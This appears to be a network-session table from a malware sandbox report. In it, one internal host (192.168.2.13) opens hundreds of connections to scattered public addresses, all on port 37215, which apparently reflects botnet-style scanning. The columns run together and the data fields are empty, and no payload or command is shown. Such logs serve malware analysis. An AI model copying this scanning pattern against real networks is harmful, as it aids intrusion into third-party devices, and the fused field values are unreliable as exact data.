                                                  12223192.168.2.135939641.187.41.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12224192.168.2.1340918197.72.6.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12225192.168.2.1342560157.77.35.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12226192.168.2.1342246157.183.151.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12227192.168.2.134017641.252.28.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12228192.168.2.133664041.167.129.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12229192.168.2.133504414.237.5.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12230192.168.2.1334286160.113.231.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12231192.168.2.134924441.19.31.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12232192.168.2.1336012197.122.70.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12233192.168.2.1340566197.5.114.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12234192.168.2.133768841.102.162.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12235192.168.2.134998041.136.230.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12236192.168.2.1359570157.177.213.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12237192.168.2.134416290.6.3.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12238192.168.2.136084241.145.218.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12239192.168.2.1344630197.118.169.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12240192.168.2.1347318157.197.107.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12241192.168.2.1347168208.253.80.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12242192.168.2.135307885.95.164.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12243192.168.2.1355516174.87.145.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12244192.168.2.1353886157.4.117.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12245192.168.2.1348790200.253.38.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12246192.168.2.1356596197.106.51.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12247192.168.2.1357798150.183.221.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12248192.168.2.1346140110.16.254.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12249192.168.2.135246241.145.202.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12250192.168.2.1355352157.5.116.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12251192.168.2.134561275.11.192.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12252192.168.2.133659859.169.183.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12253192.168.2.1351762197.194.148.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12254192.168.2.135990841.20.35.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12255192.168.2.135057491.67.199.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12256192.168.2.1334780132.70.247.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12257192.168.2.1333046197.12.70.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12258192.168.2.133971441.134.133.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12259192.168.2.1342590157.90.116.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12260192.168.2.1344256102.118.12.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12261192.168.2.133826058.56.57.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12262192.168.2.134121899.154.17.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12263192.168.2.1332946197.143.101.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12264192.168.2.134349041.98.174.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12265192.168.2.135514441.162.68.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12266192.168.2.1356182197.63.199.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12267192.168.2.133732241.51.106.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12268192.168.2.1347542157.233.146.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12269192.168.2.134280441.116.38.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12270192.168.2.1351516197.47.83.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12271192.168.2.135836641.26.48.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12272192.168.2.133631641.23.221.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12273192.168.2.13409588.242.226.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12274192.168.2.1355432197.96.71.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12275192.168.2.133473041.253.161.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12276192.168.2.1344620157.167.117.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12277192.168.2.1350372157.104.140.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12278192.168.2.1348242158.52.72.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12279192.168.2.1359336157.28.144.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12280192.168.2.134023641.51.15.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12281192.168.2.1340362157.82.228.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12282192.168.2.1354256186.139.19.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12283192.168.2.1360214197.168.134.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12284192.168.2.135386227.50.86.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12285192.168.2.1352226157.238.29.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12286192.168.2.134429241.92.149.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12287192.168.2.1341104197.11.96.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12288192.168.2.1340144197.122.0.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12289192.168.2.1354858157.21.234.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12290192.168.2.133766241.0.244.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12291192.168.2.135608841.24.235.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12292192.168.2.133479641.31.94.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12293192.168.2.1349454157.30.247.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12294192.168.2.1354810197.2.133.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12295192.168.2.134599841.154.172.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12296192.168.2.1345534216.206.240.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12297192.168.2.135974841.81.123.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12298192.168.2.1353416209.240.134.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12299192.168.2.1341194157.13.77.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12300192.168.2.1336660157.76.183.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12301192.168.2.1360466138.47.229.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12302192.168.2.134895841.248.140.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12303192.168.2.1356614157.194.222.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12304192.168.2.135524641.25.236.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12305192.168.2.133916241.28.65.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12306192.168.2.1336168197.93.219.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12307192.168.2.135312441.41.136.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12308192.168.2.134607841.57.34.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12309192.168.2.1347688106.138.230.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12310192.168.2.133417041.211.36.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12311192.168.2.135897241.126.198.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12312192.168.2.1346550157.250.196.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12313192.168.2.134130027.152.48.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12314192.168.2.135185641.123.17.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12315192.168.2.1333038197.137.17.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12316192.168.2.1342730157.156.246.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12317192.168.2.1335750157.167.92.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12318192.168.2.134265813.116.253.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12319192.168.2.1355352197.164.23.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12320192.168.2.135276441.118.42.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12321192.168.2.1334774157.112.13.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12322192.168.2.1356720197.240.154.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12323192.168.2.1356306197.203.175.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12324192.168.2.1351390197.227.4.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12325192.168.2.133625441.56.10.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12326192.168.2.1339458197.2.180.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12327192.168.2.1335930157.219.14.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12328192.168.2.134513641.17.222.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12329192.168.2.1335690157.203.70.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12330192.168.2.134203083.254.185.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12331192.168.2.1359226197.106.26.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12332192.168.2.1349756157.135.162.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12333192.168.2.134094441.139.151.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12334192.168.2.1353492197.195.29.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12335192.168.2.1346520117.127.54.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12336192.168.2.134560492.56.170.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12337192.168.2.1347016157.162.186.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12338192.168.2.134181290.83.20.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12339192.168.2.1358964157.154.106.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12340192.168.2.1348458157.247.22.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12341192.168.2.1340506197.227.135.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12342192.168.2.134489241.191.102.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12343192.168.2.1341582197.53.147.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12344192.168.2.1337086157.78.237.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12345192.168.2.135661241.49.35.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12346192.168.2.1334188157.247.254.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12347192.168.2.136046041.110.27.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12348192.168.2.134458041.243.220.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12349192.168.2.1349826157.96.19.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12350192.168.2.134100489.255.10.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12351192.168.2.133870848.41.107.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12352192.168.2.133746441.173.24.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12353192.168.2.1353990197.75.28.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12354192.168.2.134645041.237.133.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12355192.168.2.133571441.110.74.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12356192.168.2.135259841.206.46.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12357192.168.2.1344460157.83.9.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12358192.168.2.134228041.117.161.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12359192.168.2.1333764197.155.121.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12360192.168.2.1347944197.85.141.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12361192.168.2.1342458157.55.146.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12362192.168.2.133805641.246.141.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12363192.168.2.134073441.122.6.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12364192.168.2.134582841.152.242.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12365192.168.2.134459041.64.123.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12366192.168.2.134078041.205.188.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12367192.168.2.1357064157.16.66.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12368192.168.2.134895851.71.115.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12369192.168.2.1356956197.169.237.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12370192.168.2.1342386157.228.146.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12371192.168.2.1352534157.5.245.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12372192.168.2.1356398157.161.26.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12373192.168.2.1347888157.177.99.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12374192.168.2.1360674197.254.144.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12375192.168.2.133401441.233.175.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12376192.168.2.1338596147.180.47.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12377192.168.2.1342606197.36.255.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12378192.168.2.135590041.11.54.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12379192.168.2.1342468197.39.135.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12380192.168.2.1334244157.54.237.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12381192.168.2.1335638113.125.132.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12382192.168.2.1354768157.162.133.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12383192.168.2.1345662197.171.184.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12384192.168.2.1332998197.109.144.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12385192.168.2.133892290.65.171.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12386192.168.2.1357080197.240.149.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12387192.168.2.1336106157.80.62.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12388192.168.2.13425441.34.43.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12389192.168.2.1352450157.237.0.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12390192.168.2.134716265.193.26.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12391192.168.2.135825841.220.135.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12392192.168.2.1334870197.248.171.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12393192.168.2.1354204197.8.171.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12394192.168.2.1346320197.185.242.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12395192.168.2.1347534157.176.188.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12396192.168.2.1355278197.108.144.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12397192.168.2.1360728164.123.187.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12398192.168.2.1360980157.174.135.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12399192.168.2.1344088157.237.174.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12400192.168.2.133675041.236.111.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12401192.168.2.1346642197.152.16.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12402192.168.2.1352154197.34.207.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12403192.168.2.135959641.140.246.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12404192.168.2.135267441.165.2.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12405192.168.2.135200241.110.66.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12406192.168.2.1353628197.115.60.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12407192.168.2.135645251.151.209.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12408192.168.2.1356032157.102.6.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12409192.168.2.134483627.53.0.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12410192.168.2.1346142185.53.198.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12411192.168.2.133526418.68.146.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12412192.168.2.1360934157.175.127.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12413192.168.2.134814041.233.58.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12414192.168.2.134719435.143.131.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12415192.168.2.133571241.204.137.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12416192.168.2.1335626197.56.172.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12417192.168.2.1333030197.212.205.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12418192.168.2.1348456191.65.132.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12419192.168.2.134928041.52.53.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12420192.168.2.1357756113.228.183.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12421192.168.2.135036241.86.54.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12422192.168.2.1334004125.131.235.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12423192.168.2.1344674197.234.43.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12424192.168.2.1349858157.206.79.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12425192.168.2.1356286197.75.58.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12426192.168.2.135601051.137.117.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12427192.168.2.1345104197.99.184.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12428192.168.2.1348496157.143.104.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12429192.168.2.135259427.86.100.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12430192.168.2.135888241.76.228.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12431192.168.2.1349958151.194.105.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12432192.168.2.1337614157.40.130.21437215
                                                  TimestampBytes transferredDirectionData


